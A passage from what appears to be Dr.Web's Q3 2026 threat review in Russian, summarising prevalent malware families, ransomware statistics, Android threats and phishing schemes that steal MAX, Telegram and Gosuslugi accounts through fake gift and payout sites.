&lt;p&gt;В июле антивирусная лаборатория «Доктор Веб» &lt;a href="https://news.drweb.ru/show/?i=15276" target="_blank"&gt;предупредила&lt;/a&gt; о трояне, атакующем разработчиков ПО. Он заражает проекты на языках программирования C++ и C#, в результате чего компилируемые приложения также становятся зараженными и участвуют в дальнейшем распространении угрозы. Кроме того, если инфицированные проекты размещаются в открытом доступе, другие разработчики после их скачивания и использования тоже компрометируют свои системы и все создаваемые программы. Этот троян реализует сразу несколько вредоносных функций: он действует как стилер данных, майнер криптовалюты, бэкдор, а также клиппер, крадущий информацию из буфера обмена.&lt;/p&gt;

&lt;p&gt;Пользователи Android в течение последних 3 месяцев наиболее часто сталкивались с вредоносными программами &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, которые позволяют перенаправлять трафик злоумышленников через зараженные устройства. Кроме того, отмечался рост активности банковских троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Banker&amp;lng=ru"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;. Среди лидеров по числу детектирований остаются Android-программы, модифицированные с помощью хакерских инструментов. Вирусописатели используют их для защиты вредоносных приложений от обнаружения и анализа.&lt;/p&gt;

&lt;p&gt;В течение III квартала вирусные аналитики «Доктор Веб» обнаружили десятки троянских программ в каталоге Google Play. Среди них было множество троянов &lt;a href="https://vms.drweb.ru/search/?q=Android.Joker&amp;lng=ru"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, подписывающих жертв на платные услуги. При этом наши эксперты выяснили, что в некоторые новые модификации этих вредоносных программ добавлена функциональность, позволяющая превращать зараженные устройства в выходные узлы прокси-ботнета.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Главные тенденции III квартала&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Пользователи реже сталкивались с различными угрозами.&lt;/li&gt;
        &lt;li&gt;Снизилось число уникальных файлов, задействованных в атаках.&lt;/li&gt;
        &lt;li&gt;Среди детектируемых угроз было меньше уникальных имен.&lt;/li&gt;
        &lt;li&gt;Количество запросов на расшифровку файлов, затронутых вредоносными программами-шифровальщиками, по сравнению со II кварталом увеличилось.&lt;/li&gt;
        &lt;li&gt;Интернет-мошенники продолжили активно атаковать пользователей российского мессенджера MAX с целью получить доступ к их учетным записям.&lt;/li&gt;
        &lt;li&gt;Вирусные аналитики «Доктор Веб» обнаружили опасного многофункционального трояна, который нацелен на разработчиков ПО и для своего распространения заражает проекты на языках программирования C++ и C#.&lt;/li&gt;
        &lt;li&gt;Самыми распространенными Android-угрозами стали трояны из семейства &lt;a href="https://vms.drweb.ru/search/?q=Android.Proxy&amp;lng=ru"&gt;&lt;b&gt;Android.Proxy&lt;/b&gt;&lt;/a&gt;, позволяющие перенаправлять сетевой трафик злоумышленников через зараженные устройства.&lt;/li&gt;
        &lt;li&gt;В каталоге Google Play были обнаружены новые вредоносные приложения.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;По данным сервиса статистики «Доктор Веб»&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/01_stat_q3_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/01_stat_q3_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы III квартала 2026 года&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Рекламное ПО, выступающее в роли промежуточного установщика пиратских программ.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PWS.Salat.390&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Троянская программа, похищающая пароли от различных сервисов, а также другую конфиденциальную информацию.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Торрент-клиент, устанавливающий нежелательное ПО на устройство.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Proxy.32&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Программа, которая превращает целевой компьютер в выходной узел прокси-сети и позволяет перенаправлять через устройство сторонний трафик.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Статистика вредоносных программ в почтовом трафике&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/02_mail_traffic_q3_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/02_mail_traffic_q3_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Наиболее распространенные угрозы III квартала 2026 года в почтовом трафике&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;X97M.DownLoader.2343&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;XLSX-файл (формат электронных таблиц Microsoft Excel) с OLE-объектом, скачивающим вредоносный файл на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.9376&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт в формате JavaScript, который скачивает в целевую систему другое вредоносное ПО.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;VBS.Starter.541&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт в формате Visual Basic Script. Предназначен для запуска различных вредоносных приложений на целевых компьютерах.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Muldrop.1417&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Вредоносный скрипт в формате JavaScript, который запускает в целевой системе скрытое в нем ВПО.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Шифровальщики&lt;/h3&gt;

&lt;p&gt;По сравнению со II кварталом, число запросов на расшифровку файлов, затронутых троянскими программами-шифровальщиками, возросло на 5,82%.&lt;/p&gt;

&lt;p&gt;Динамика поступления запросов на расшифровку в Службу технической поддержки «Доктор Веб»:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/03_encoder_requests_q3_2026_ru.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/03_encoder_requests_q3_2026_ru.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Обращения пользователей чаще всего были связаны с активностью следующих энкодеров:&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 13,98% обращений&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; — 3,76% обращений&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.44474&lt;/b&gt; — 3,23% обращений&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.30356&lt;/b&gt; — 2,69% обращений&lt;/li&gt;
    &lt;li&gt;&lt;b&gt;Trojan.Encoder.44383&lt;/b&gt; — 2,15% обращений&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;Сетевое мошенничество&lt;/h3&gt;

&lt;p&gt;В III квартале 2026 года продолжился рост интереса мошенников к пользователям российского мессенджера MAX, который интернет-аналитики компании «Доктор Веб» отметили еще в предыдущем квартале. В течение последних трех месяцев наши специалисты выявили большую группу нежелательных сайтов с похожим стилем оформления, созданных злоумышленниками для кражи учетных записей мессенджера. На этих сайтах потенциальные жертвы якобы могли получить доступ к разнообразным сервисам и услугам. Для этого под различными предлогами у них запрашивался номер мобильного телефона и поступающий на него проверочный код. В ряде случаев пользователям прямо говорилось, что для получения желаемого им необходимо войти в свою учетную запись MAX. В других авторизация вовсе не упоминалась, а номер телефона и код подтверждения якобы требовались лишь для проверки того, что посетители не являются ботами. Однако независимо от заявленной причины, если пользователи попадались на уловку и предоставляли соответствующие данные, итог был одним: мошенники получали доступ к их аккаунтам. При этом на таких сайтах нередко встречались орфографические, грамматические и пунктуационные ошибки.&lt;/p&gt;

&lt;p&gt;Одним из прикрытий для атакующих стало возобновление работы игровой платформы Roblox на территории России в начале лета. Она популярна среди детей и подростков — аудитории, которая традиционно более уязвима к киберугрозам и потому является привлекательной целью для злоумышленников.&lt;/p&gt;

&lt;p&gt;В одном из сценариев потенциальным жертвам «в честь разблокировки» Roblox предлагались в подарок бесплатные монеты Robux («Робуксы») — это внутриигровая цифровая валюта сервиса. В зависимости от сайта мошенники обещали от 1 до 30 тыс. монет:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/04_fake_max1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/04_fake_max1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/05_fake_max2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/05_fake_max2.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Чтобы «получить» их, пользователи должны были нажать соответствующую кнопку (например, «Забрать» или «Получить»), указать номер телефона для «подтверждения», после чего ввести проверочный код, поступивший в СМС или непосредственно в мессенджере MAX:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/06_fake_max3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/06_fake_max3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В других вариантах посетителям предлагались различные скрипты и читы для Roblox, редкие игровые предметы, а также «тапалки» (от англ. &lt;em&gt;tap&lt;/em&gt; — «постукивать») — простые игры-кликеры и приложения, где при помощи нажатий на экране накапливаются виртуальные ресурсы (очки, бонусы, монеты), которые затем якобы можно перевести в ту или иную игру. Для «доступа» к ним потенциальные жертвы аналогичным образом должны были нажать нужную кнопку («Скачать», «Подтвердить» и т. д.) и предоставить для «подтверждения» телефонный номер:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/07_fake_max4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/07_fake_max4.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/08_fake_max5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/08_fake_max5.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Киберпреступники эксплуатировали образ еще одной популярной среди молодежной аудитории игры — Brawl Stars. Как и в случае с Roblox, на мошеннических сайтах потенциальным жертвам предлагались бесплатные внутриигровые предметы и бонусы. Пользователи MAX якобы могли получить их, отсканировав специальный QR-код:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/09_fake_max6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/09_fake_max6.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/10_fake_max7.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/10_fake_max7.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Для «получения» соответствующего QR-кода от них требовалось «пройти проверку через MAX», указав для этого номер мобильного телефона и код, поступивший в СМС или в мессенджере:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/11_fake_max8.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/11_fake_max8.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/12_fake_max9.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/12_fake_max9.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Кроме того, на некоторых из этих фишинговых сайтов злоумышленники обещали различные подарки якобы от имени как самой игры, так и ее разработчиков — например, бесплатные ящики с наградами:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/13_fake_max10.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/13_fake_max10.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/14_fake_max11.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/14_fake_max11.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошенники обещают подарки от Brawl Stars и SUPERCELL, такие как бесплатные ящики с игровыми предметами (например, ящики персонажа Болт). Пользователей просят нажать кнопку подтверждения и указать номер мобильного телефона с проверочным кодом&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Помимо получения различных бонусов и подарков для популярных игр, киберпреступники пытались привлечь потенциальных жертв и другими предложениями. Среди них — якобы услуги продвижения в социальных сетях — например, в Likee. Мошенники обещали «накрутку» числа подписчиков, лайков и комментариев, но для этого пользователи якобы должны были авторизоваться с помощью мессенджера MAX:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/15_fake_max12.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/15_fake_max12.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Фишинговый сайт обещает продвижение в сети Likee, но для этого якобы необходима авторизация через мессенджер MAX&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Ряд этих сайтов предлагал посетителям установить специализированные моды (модифицированные версии) MAX, которые, как утверждалось, позволяют закреплять музыкальные композиции в профиле мессенджера. Для «получения» такого мода пользователи должны были авторизоваться по номеру мобильного телефона и войти в личный аккаунт. Стоит отметить, что возможность добавлять музыку в профиль сейчас отсутствует в официальной версии MAX, но она есть в ряде других конкурирующих сервисов. Расчет мошенников идет на то, что потенциальные жертвы в погоне за привлекательной функциональностью ослабят бдительность и попадутся на уловку.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/16_fake_max13.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/16_fake_max13.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Мошеннический сайт предлагает «возможность ставить треки в профиль MAX»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Встречались и другие сценарии обмана. Например, некоторые интернет-ресурсы предлагали доступ к «Единой базе СВО», якобы позволяющей находить информацию о гражданах, принимавших участие в СВО. Однако поиск этих данных, как было указано на сайтах, якобы возможен только авторизованным пользователям:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/17_fake_max14.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/17_fake_max14.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В еще одном сценарии пользователям предлагался доступ к электронному классному журналу для проверки школьных оценок:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/18_fake_max15.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/18_fake_max15.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Другие сайты якобы позволяли использовать веб-версию мессенджера MAX и предлагали авторизоваться по номеру телефона, чтобы «перейти в профиль»:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/19_fake_max16.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/19_fake_max16.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/20_fake_max17.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/20_fake_max17.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Некоторые из этих мошеннических онлайн-ресурсов обещали помочь определить, под каким именем потенциальная жертва записана в списке контактов других пользователей. Для этого посетителям предлагалось «подтвердить свою личность», авторизовавшись в MAX:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/21_fake_max18.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/21_fake_max18.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Ряд сайтов обещал бесплатный доступ к закрытым материалам блогеров и создателей контента категории для взрослых, включая просмотр «утекших» медиаархивов и возможность получить пробную подписку в специализированных сервисах. При этом требование мошенниками авторизации через мессенджер MAX с указанием кода подтверждения объяснялось в том числе необходимостью «защиты от ботов и блокировок»:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/22_fake_max19.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/22_fake_max19.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/23_fake_max20.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/23_fake_max20.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В то же время в рамках данной кампании под прицелом оказалась не только аудитория MAX, но и других мессенджеров, включая Telegram. Так, некоторые из выявленных сайтов имитировали чат с официальным аккаунтом мессенджера и якобы от лица платформы предлагали потенциальным жертвам подарок — подписку Telegram Premium:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/24_fake_telegram1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/24_fake_telegram1.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/25_fake_telegram2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/25_fake_telegram2.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Для ее «получения» пользователи должны были авторизоваться в своей учетной записи, указав номер мобильного телефона и поступивший на него одноразовый проверочный код:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/26_fake_telegram3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/26_fake_telegram3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В похожем сценарии потенциальным жертвам злоумышленники обещали возможность бесплатно получить виртуальные подарки экосистемы Telegram из различных коллекций, таких как Toy Bear (плюшевый мишка), Snoop Dogg и других. Для этого мошенники просили пользователей «пройти проверку» (например, что те не являются роботами, и чтобы каждый посетитель якобы получил подарок лишь один раз), указав для этого номер мобильного телефона и код подтверждения. Не исключено, что данные варианты мошеннических сайтов, как и в случае с игровой тематикой, в первую очередь были ориентированы на детей и подростков:&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/27_fake_telegram4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/27_fake_telegram4.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/28_fake_telegram5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/28_fake_telegram5.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Киберпреступники также пытались привлечь потенциальных жертв возможностью получить звезды Telegram (внутреннюю цифровую валюту мессенджера) за «подписку» на те или иные каналы в мессенджере. В данном случае от пользователей вновь требовалось войти в свою учетную запись Telegram и предоставить код проверки:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/29_fake_telegram6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/29_fake_telegram6.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;В III квартале 2026 года эксперты «Доктор Веб» наблюдали дальнейшее развитие мошеннических схем, нацеленных на кражу персональных данных и учетных записей в различных сервисах. Одним из распространенных сценариев в арсенале мошенников остается информирование о якобы произошедшей компрометации аккаунтов. Обычно злоумышленники сразу ставят потенциальных жертв перед фактом «утечки» данных и необходимостью предпринять срочные меры по защите конфиденциальной информации (например, перейти по указанной ссылке, позвонить в «поддержку» и т. д.). Однако в ряде выявленных нашими интернет-аналитиками случаев на фишинговых сайтах запугивание «случившимся» взломом целенаправленно происходило постепенно. Шаг за шагом пользователя заставляют нервничать все больше и больше, чтобы тот в итоге утратил бдительность и выполнил необходимые злоумышленникам действия. Среди сайтов с подобной схемой обмана были, например, очередные подделки интернет-порталов поставщиков коммунальных услуг.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/30_scam_energ1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/30_scam_energ1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Фишинговый сайт, замаскированный под официальный веб-ресурс российской электросетевой компании, предлагает войти в учетную запись&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После того как потенциальная жертва, полагая, что она находится на настоящем сайте, вводит данные для входа в учетную запись, мошеннический ресурс имитирует процесс авторизации через «Госуслуги» и «синхронизацию» с базами данных различных государственных ведомств:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/31_scam_energ2.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/31_scam_energ2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт создает видимость авторизации через «Госуслуги» и синхронизации с «ведомственными базами данных»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Однако далее сайт сообщает, что учетная запись «Госуслуг» пользователя взломана. Для убедительности он информирует о некоем устройстве, с которого якобы выполнялся вход на «Госуслуги», а также указывает отдаленное географическое расположение места, откуда «произошло» несанкционированное подключение. Сайт также предупреждает, что если эти действия выполнялись не самим пользователем, его аккаунт будет заблокирован. Для «отмены синхронизации» чужого устройства и предотвращения утечки персональной информации от потенциальной жертвы «требуется немедленно связаться с оператором»:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/32_scam_energ3.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/32_scam_energ3.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Для «отмены» привязки чужого устройства к аккаунту «Госуслуг» и якобы защиты персональных данных, включая сведения о паспорте, СНИЛС и ИНН, пользователю предлагается связаться с «оператором»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;После того как пользователь нажимает кнопку «запроса звонка», сайт тянет время, демонстрируя таймер обратного отсчета на одну или несколько минут и сообщение, что запрос обрабатывается:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/33_scam_energ4.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/33_scam_energ4.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт информирует, что запрос обрабатывается, и «дежурный оператор» свяжется с пользователем в течение указанного времени&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;По окончании таймера ничего, что могло бы помочь прояснить ситуацию, не происходит. Вместо этого на мошеннической веб-странице появляются кнопки для повторного «запроса», а также для самостоятельной связи с «дежурным оператором»:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/34_scam_energ5.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/34_scam_energ5.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Сайт предлагает повторно запросить звонок специалиста, либо позвонить «дежурному оператору» напрямую&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;При нажатии первой кнопки таймер «ожидания запроса» появляется вновь, и процесс повторяется. При нажатии второй кнопки демонстрируются номера телефонов «выделенной линии поддержки», которые на самом деле принадлежат мошенникам. Цель этой схемы состоит в том, чтобы потенциальная жертва после вынужденного ожидания сильнее запаниковала и с большей вероятностью позвонила по одному из указанных номеров, опасаясь возможной утечки персональных данных и потери доступа к «Госуслугам». Кроме того, злоумышленники убивают двух зайцев, непосредственно похищая и данные, необходимые для входа в личный кабинет пользователя на сайте поставщика коммунальных услуг.&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/35_scam_energ6.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/35_scam_energ6.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Для ускорения решения «проблемы» потенциальной жертве предлагаются телефонные номера «выделенной линии поддержки»&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Интернет-аналитики «Доктор Веб» в течение последних трех месяцев продолжили выявлять новые мошеннические сайты, обещающие различные выплаты и пособия. Некоторые из них киберпреступники выдавали за официальный сайт российской государственной платформы «Работа в России» (&lt;em&gt;trudvsem.ru&lt;/em&gt;), где размещаются вакансии и резюме и которая помогает в трудоустройстве. Поддельные интернет-ресурсы информировали о том, что граждане, ранее регистрировавшиеся на официальном портале, якобы могут получить дополнительную выплату от Центра занятости населения. При этом размер обещанной выплаты в некоторых случаях мог достигать десятков тысяч рублей.&lt;/p&gt;

&lt;p&gt;Для «получения» денег пользователям предлагалось оформить отдельную банковскую карту платежной системы «МИР», куда в дальнейшем якобы поступит «пособие». После этого от них также требовалось ее активировать, совершив какую-либо покупку. Для оформления карты мошеннические сайты предоставляли форму для ввода персональных данных: имени, фамилии и отчества, номера телефона и адреса электронной почты:&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/36_fake_trud1.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/october/review_common_q3/36_fake_trud1.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Поддельный сайт платформы «Работа в России» обещает «дополнительную выплату от Центра занятости» при условии оформления новой банковской карты&lt;/em&gt;&lt;/p&gt;

